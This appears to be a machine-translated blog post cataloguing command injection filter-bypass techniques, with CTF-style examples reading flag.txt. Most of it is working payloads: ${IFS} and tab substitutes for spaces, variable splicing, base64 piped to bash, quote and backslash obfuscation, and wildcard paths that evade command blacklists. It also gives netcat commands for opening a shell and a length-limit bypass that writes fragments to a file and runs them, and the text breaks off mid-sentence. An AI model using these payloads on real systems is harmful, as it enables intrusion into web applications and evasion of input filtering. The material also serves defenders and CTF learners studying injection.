当前位置：网站首页>Summary of command injection bypass methods

Summary of command injection bypass methods

2022-07-28 06:15:00 【cainsoftware】

Preface

Command injection yes web One of the common vulnerabilities in , because web The application does not strictly filter the data submitted by users , As a result, user input can be directly linux or windows The system executes as a command , Generally, it will cause serious harm .

Common symbols

A semicolon （;）

Segmentation symbol when multiple statements are executed in sequence .

cmd1;cmd2

Pipe, （|）

cmd1 Output of command , As the next command cmd2 Parameters of .

cmd1|cmd2

and（&&）

And command ,cmd1 Success means execution cmd2,cmd1 Failure means no execution cmd2

cmd1 && cmd2

or（||）

Or order ,cmd1 If it fails, execute cmd2,cmd1 Success does not result in execution cmd2

cmd1 || cmd2

The quotation marks （） and $()

The quotes and $() Can be used to express commands , The strings contained by these two methods will be executed first as commands .

echo "result : `whoami`"echo "result : $(whoami)"

Bypass mode summary

Space around

In a system that filters spaces , With cat flag.txt For example , The system does not allow us to enter spaces or be filtered after entering .

${IFS}

You can use ${IFS} Instead of spaces .

cat${IFS}flag.txtcat$IFS$1flag.txtcat${IFS}$1flag.txt

Redirector bypass (<>)

cat<>flag.txtcat<flag.txt

%09( need php Environmental Science )

php In the environment web Input %09 Equivalent to TAB

cat%09flag.txt

Blacklist bypasses

Splicing

Use shell Variable splicing keywords restricted by blacklist

a=c;b=at;c=fl;d=ag;e=.txt;$a$b $c$d$e;

base64

Use backquotes to contain base64 Decoded command

`echo "Y2F0IGZsYWcudHh0Cg==" | base64 -d`

take base64 The decoded command is passed to... Through the pipeline character bash

echo "Y2F0IGZsYWcudHh0Cg==" | base64 -d | bash

Single quotation marks , Double quotes

c""at fl''ag.tx""t

The backslash

c\at fl\a\g.tx\t

ca$1t fl$1ag.t$1xt

Read file bypass

(1)more: Page by page display file content (2)less: And  more  similar , But compared to  more  What's better is , He can [pg dn][pg up] Page turning (3)head: Look at the first few lines (4)tac: Start with the last line to show , It can be seen that  tac  yes  cat  Reverse display of (5)tail: Look at the last few lines (6)nl： On display , Output line number by the way (7)od: Read file contents in binary mode (8)vi: An editor , This can also be viewed (9)vim: An editor , This can also be viewed (10)sort: You can see (11)uniq: You can see (12)file -f: Report the details of the error

Wildcard bypass

/??? Will go to find / A three character file in the directory , Under normal circumstances, you will find /bin, then /?[a][t] Will be preferentially matched to /bin/cat, You have successfully called cat command , Then you can use normal wildcards to match the files you need to read , Such as flag.txt File name length is 8, Use 8 individual ?’’, This command will read all the data with length 8 The file of .

/???/?[a][t] ?''?''?''?''?''?''?''?''

Empathy , We can also match /bin Other commands , Such as more,less,vi,tail Wait for the command to view the file , Or execute other commands .

/???/[m][o]?[e] ?''?''?''?''?''?''?''?''

/???/[t]?[i][l] ?''?''?''?''?''?''?''?''

Even open one shell

/???/[n]?[t]??[t] -lvp 4444

/???/[n]?[t]??[t] 192.168.1.3 4444

Command nesting

echo "result:`whoami`"

echo "result:$(uname -a)"

The length bypasses

Use >> Bypass the length limit

Use >> Add some commands to the file at a time

echo -n "cmd1" > r;echo -n "cmd2" >> r;echo -n "cmd3" >> r;echo "cmd4" >> r;

And then use cat r | bash Carry out orders

Use newline to execute and ls -t Bypass the length limit

linux in , If the command in the file needs to be written on a new line , You need to add... At the end of the previous line \, Such as file a There is